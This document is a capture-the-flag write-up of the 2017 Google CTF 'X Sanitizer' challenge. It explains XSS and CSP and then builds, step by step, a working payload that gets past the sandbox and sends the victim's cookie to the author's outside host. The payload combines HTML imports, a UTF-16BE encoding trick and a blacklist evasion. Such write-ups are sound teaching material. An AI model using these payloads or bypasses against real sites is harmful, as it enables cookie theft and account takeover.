This writeup is for the reversing challenge “X Sanitizer” we solved during 2017 Google CTF Quals. This writeup and 3 others were also submitted to the Google CTF Writeup Competition.
Some parts of this writeup will include background information about the concept.
Investigation: Index page
The site contains a text box, which we can enter html into. When the button is clicked, it runs some kind of sanitization program, and finally renders the output back to the screen. The page claims that the entire process is client side, and that there is no hidden server logic. From this and description, I would guess that the goal is to preform a Cross Site Scripting (XSS) attack on the page.
Background: Cross Site Scripting
Browsers try to protect users from malicious websites by using something called the Same
Origin Policy (SOP). This policy controls what a website can and cannot do. For example a
website can access its own cookies and read its own web pages, but it cannot read
the cookies or data of another webpage. To define what a webpage is, we use the term
origin. A page’s origin in most cases is based on the domain name. So google.com
is
one origin, while facebook.com
is another.
The fact that SOP blocks cookies is a good thing for the user, because most websites use cookies to tell if you are logged in. Reading another site’s cookie would allow an attacker to log in as you.
However, I mentioned that websites can access their own cookies. Here is where XSS comes into play. If an attacker can run javascript on a website, they will have all the same permissions as the website, even if the script was not originally from the website (hence the name cross site scripting). Executing javascript on this origin will be our goal for this challenge.
Investigation: Santization system
Included from the index page was two javscript script file sanitize.js
. We can see that
it first takes our input in the Sanitize function. The code then spawns a service worker.
Service workers are a feature in chrome which allow the client to server response to
requests for a script. Below we can see the responses it sends as part of the fetch
function:
/sandbox
will append the contents of the url parameterhtml
to this html which loads the sanitize script:
<!doctype HTML>
<script src=sanitize>
</script>
<body>
/sanitize
will respond with a script that sets up a 1 second timer to respond to the parent, as well as a Content Security Policy (more on that in a second). It also creates a remove function which will either delete a given html node, or remove the documents contents:
// Onload, wait one second, and respond with the document's contents
onload = _=> setTimeout(_=> parent.postMessage(document.body.innerHTML, location.origin), 1000);
// This function removes a given node from the document
remove = node => (node == document) ? document.body.innerHTML = '' : node.parentNode.removeChild(node);
// On CSP error, call remove on the violating element
document.addEventListener("securitypolicyviolation", e => remove(e.target));
// Write an html meta tag to enable the CSP
document.write('<meta http-equiv="Content-Security-Policy" content="default-src \\'none\\'; script-src *"><body>');
- Any other request will respond with a page that is designed to either be html or javascript, either way it will run the javascript (since it will request x which just returns this page again.) The purpose of this code is to delete whatever requested it, either the script tag, or the HTML import (we’ll look at this more soon too):
with(document) remove(document === currentScript.ownerDocument ? currentScript : querySelector('link[rel="import"]'));
// <script src=x></script>
The sanitize function first tries to remove a few black listed words from our input:
while (html.match(/meta|srcdoc|utf-16be/i)) html = html.replace(/meta|srcdoc|utf-16be/i, '');
Since they run it with a loop, we cannot bypass it by simply doing something like
<me<meta>ta>
. However, it is good to keep in mind what they are trying to block.
Finally the function creates an iframe pointed at /sandbox?html=<OURINPUT>
and lets it
run. As we saw above, after 1 second the page will send its contents to us. Once we get
that back, the script writes the contents to the page without any further sanitization. If
we can get any javascript into here, we should be able to steal the cookies.
Investigation: Sandbox page
As I said, the script run in the sandbox page sets up a Content Security Policy (CSP)
using the meta html tag. This policy consits of default-src 'none'; script-src *
. This
means that by default all requests and inline content will be blocked, but all script
requests will be allowed (but not inline content). Seeing this we can also check the CSP
of the main page to find it is script-src 'self'
which will block all script requests
not going to the same origin.
Background: Content Security Policy
A CSP is another tool the browser uses to protect sites. Like SOP it dictates what a site
is allowed to do. However, these restrictions are actually enabled by the site itself, to
protect it from things it might not normally do. For example, if a site never expects to
run unsigned script tags, then if one appears, it is probably an attacker trying to
preform an XSS attack. By setting script-src
in the CSP, the site knows to block that
tag. Good CSPs are very effective and can be very difficult to bypass.
To check for a CSP, first check the response headers of the site. If there is not one
there, it can still be enabled with a <meta>
HTML tag in the page header.
Sandbox
The CSP on the sandbox page also has a special feature. The sanitize script sets up a
callback which will be called on securitypolicyviolation
which will happen any time a
request is blocked by the CSP. It calls the remove function, which will delete the element
that caused the CSP to trigger, removing them from the final output of the sandbox!
The second feature is that any scripts we run will respond with the javascript that
removes the script tag. This also tries to stop HTML imports. HTML imports are a way of
loading another HTML page into the current page, and is useful for XSS since the browser
will run anything we put on the other page (assuming the CSP doesn’t stop it.) It is done
like this: <link rel="import" href="page to load">
Here, importing any page will also respond with this response. The javascript will be
ignored, but <script src=x></script>
will run, and the same script will be loaded.
querySelector('link[rel="import"]')
looks for the link
tag doing the import.
At first glance it seems that every way for us to run javascript is either blocked, or will cause our tags to be removed from the final output!
Sandbox Bypass
I found two ways to bypass the sandbox, and inject script tags into the main page. Both of them use the HTML import feature.
Method 1:
To respond to the parent, we saw that the sandbox uses a one second time:
setTimeout(_=> parent.postMessage(document.body.innerHTML, location.origin), 1000)
When this timer triggers, anything still on the page will be send back to the script.
I found that by using the async
feature of HTML imports, I could cause some to remain
when time was up. Adding async
to the import tag, causes the import to actually be
loaded after the page has finished loading. This means that onload
would have been
triggered, and the timer would have started counting down. By adding a large number of
these tags (around 500), some will remain by the time 1 second is up.
Method 2:
A simpler method, (probably the intended solution) is due to a flaw in their code. When
the import removing code is run, it uses querySelector('link[rel="import"]')
to find the
link
tag. However this will only locate the first link
tag.
If we put <link rel="import">
and also <link rel="import" href="page to load>
, then
only the first will be deleted when the second is loaded!
Using either method, we can now do a HTML import on the main page. However there is a new
problem! As I mentioned above, the main page has a CSP with script-src 'self'
. This
means that we can only run scripts and import pages from the
sanitizer.web.ctfcompetition.com
domain.
Bypassing script-src ‘self’
Our goal is still to run javscript, but now we must find a way to load it from the somewhere on the challenge.
Injecting a Script Tag
Lets start by injecting a script tag using the HTML import we smuggled out of the sandbox.
This is relatively easy, thanks to the sandbox page. We can url encode the script tag with
javascript and put it as the html
url parameter.
payload = encodeURIComponent('<script src="target"></script>');
Requesting /sandbox?html=%3Cscript%20src%3D%22target%22%3E%3C%2Fscript%3E
gives us
<!doctype HTML>
<script src=sanitize>
</script>
<body><script src="target"></script>
You may be worried about the sanitize script being run again, but luckily since our code
doesn’t actually ‘activate’ it, there is no client
yet, so the logic causes it to 404:
var isSandbox = url => (new URL(url)).pathname === '/sandbox';
if (client && isSandbox(client.url)) {
// Respond with sanitize stuff
} else if (isSandbox(e.request.url))
// Respond with sandbox page
} else
// Try to load the real page (causes /sanitize to 404)
return fetch(e.request);
}
Our payload so far:
<link rel="import"><link rel="import" href="/sandbox?html=%3Cscript%20src%3D%22target%22%3E%3C%2Fscript%3E">
Putting Javascript on /sandbox
Now we can load a script, but we can still only load from the
sanitizer.web.ctfcompetition.com
domain. We can try to put our script on /sandbox
like
we did the script tag, put that gives us problems, since the tags in the first part of the
page is not valid javascript.
To bypass this we can use an encoding attack. An encoding attack is where we specifiy a multibyte encoding for the script. If we are lucky, all of the html junk will turn into one large valid identifier, thanks to javascript’s unicode support.
If we were to load the page as utf16 big endien (specified as utf-16be
), beginning turns
into:
㰡摯捴祰攠䡔䵌㸊㱳捲楰琠獲挽獡湩瑩穥㸊㰯獣物灴㸊㱢潤社
To prevent this from causing an error, we can append =0\n
. Now we can also append our
own cookie stealing payload and encode it as utf-16be
and urlencode (for normal
characters in utf-16be
, the character is prepended by a null byte):
utf16be = function(s) {
var out = '';
for (var i=0; i<s.length; i++) {
out += '\0' + s[i];
}
return out;
}
payload = encodeURIComponent(utf16be('=0\nlocation="//itszn.com/"+document.cookie'));
We can load it like this:
<script src="/sandbox?html=%00%3D%000%00%0A%00l%00o%00c%00a%00t%00i%00o%00n%00%3D%00%22%00%2F%00%2F%00i%00t%00s%00z%00n%00.%00c%00o%00m%00%2F%00%22%00%2B%00d%00o%00c%00u%00m%00e%00n%00t%00.%00c%00o%00o%00k%00i%00e" charset="utf-16be"></script>
The script that is run is this:
㰡摯捴祰攠䡔䵌㸊㱳捲楰琠獲挽獡湩瑩穥㸊㰯獣物灴㸊㱢潤社=0
location="//itszn.com"+document.cookie
Putting it all together
Now we can put that script into the import like we did before, and we should be good to go:
payload = encodeURIComponent(utf16be('=0\nlocation="//itszn.com/"+document.cookie'));
payload = encodeURIComponent('<script src="/sandbox?html='+payload+'" charset="utf-16be"></script>');
payload = '<link rel="import"><link rel="import" href="/sandbox?html='+payload+'">'
This gives us the final long payload
<link rel="import"><link rel="import" href="/sandbox?html=%3Cscript%20src%3D%22%2Fsandbox%3Fhtml%3D%2500%253D%25000%2500%250A%2500l%2500o%2500c%2500a%2500t%2500i%2500o%2500n%2500%253D%2500%2522%2500%252F%2500%252F%2500i%2500t%2500s%2500z%2500n%2500.%2500c%2500o%2500m%2500%252F%2500%2522%2500%252B%2500d%2500o%2500c%2500u%2500m%2500e%2500n%2500t%2500.%2500c%2500o%2500o%2500k%2500i%2500e%22%3E%3C%2Fscript%3E">
However, if we try this, we find there is still one problem!
The original sandbox removes ‘utf-16be’ from our input:
while (html.match(/meta|srcdoc|utf-16be/i)) html = html.replace(/meta|srcdoc|utf-16be/i, '');
This is easy to bypass, as we can just url encode utf-16be
to utf-16b%65
with this:
payload = payload.replace('utf-16be','utf-16b%65');
The final corrected payload is
<link rel="import"><link rel="import" href="/sandbox?html=%3Cscript%20src%3D%22%2Fsandbox%3Fhtml%3D%2500%253D%25000%2500%250A%2500l%2500o%2500c%2500a%2500t%2500i%2500o%2500n%2500%253D%2500%2522%2500%252F%2500%252F%2500i%2500t%2500s%2500z%2500n%2500.%2500c%2500o%2500m%2500%252F%2500%2522%2500%252B%2500d%2500o%2500c%2500u%2500m%2500e%2500n%2500t%2500.%2500c%2500o%2500o%2500k%2500i%2500e%22%20charset%3D%22utf-16b%65%22%3E%3C%2Fscript%3E">
Waiting for the request back we see
GET /?flag=CTF{no-problem-this-can-be-fixed-by-adding-a-single-if} HTTP/1.1
Host: itszn.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
X-DevTools-Request-Id: 2811.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/59.0.3071.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
And we have captured the flag! CTF{no-problem-this-can-be-fixed-by-adding-a-single-if}